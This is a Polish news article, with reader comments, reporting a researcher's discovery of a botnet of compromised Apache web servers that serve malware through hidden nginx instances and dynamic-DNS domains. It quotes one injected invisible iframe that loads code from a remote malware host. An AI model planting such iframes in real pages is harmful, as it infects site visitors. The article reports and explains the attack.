„To co tu widzimy, to długo wyczekiwany botnet poddanych zombifikacji serwerów WWW! Grupa połączonych ze sobą serwerów ze wspólnym ośrodkiem sterującym, która służy rozprowadzaniu szkodników (…) a cały botnet jest połączony z botnetem działającym na normalnych, domowych komputerach PC” – z entuzjazmem rozpoczął swoją relację Sinegubko.
Każda z zarażonych maszyn odkrytych przez rosyjskiego badacza, to serwer wirtualny lub dedykowany, na którym hostowana jest całkiem legalna witryna, serwowana przez Apache'a na porcie 80. Jednak po cichu maszyny te uruchamiają serwer nginx na porcie 8080, wysyłając za jego pomocą szkodliwy kod. Jest to możliwe dzięki dostawcom dynamicznego DNS – DynDNS.com i No-IP.com – zapewniającym darmowe domeny, podłączane pod IP poddanych zombifikacji serwerów.
Usługi te dostarczają wielu (łącznie ponad stu) domen drugiego poziomu, które mogą być wykorzystane do konstruowania licznych i wiarygodnie wyglądających domen trzeciego poziomu. Dzięki temu atakujący mogą stosować nazwy takie jak np. server.homelinux.org – które zupełnie nie wyglądają jak typowe źródło malware'u.
Kolejnym krokiem jest wykorzystanie pływających ramek iframe, za pomocą których szkodliwy kod wstrzykiwany jest do normalnych stron internetowych. Wygląda to np. tak:
<iframe src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
Ładowanie





Przy takim zalozeniu wszystko jest zombifikowalne. Nie oznacza to bynajmniej ze linux jest jakos specjalnie podatny na zzombifikowanie.
Browser: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.13) Gecko/2009082121 Iceweasel/3.0.12 (Debian-3.0.12-1)
Browser: Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Browser: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.0) Gecko/20090623 SUSE/3.5.0-7.1 Firefox/3.5
Ciekawy jest fakt, że atak jest na sporą skalę - sam odkryłem co najmniej kilka domen, gdzie wszystkie pliki index.* mają iframe'a załączającego złośliwy kod z powyższych serwerów.
Browser: IBrowse/2.4 (AmigaOS 3.9; 68K)
wszem i wobec, polak informował o dziwny zdażeniu, ktoś jak
gdyby pominoł etap logowania a co za ty idzie, podawania
hasła i odrazu przystąpił do transkacji download upload, co
jest jeszce dziwniejsze, to to że prawdopodobnie nie miał uprawnień root-a, a dziłania dotyczyły strefy "zdemilitaryzowanej" na wymienione szczegóły, byc może troche na wyrost przezemnie, składają sie logi, więcej o tym
fakcie można przeczytać na stronie uwlinux.
Browser: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Browser: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6pre) Gecko/20091106 Ubuntu/9.04 (jaunty) Shiretoko/3.5.6pre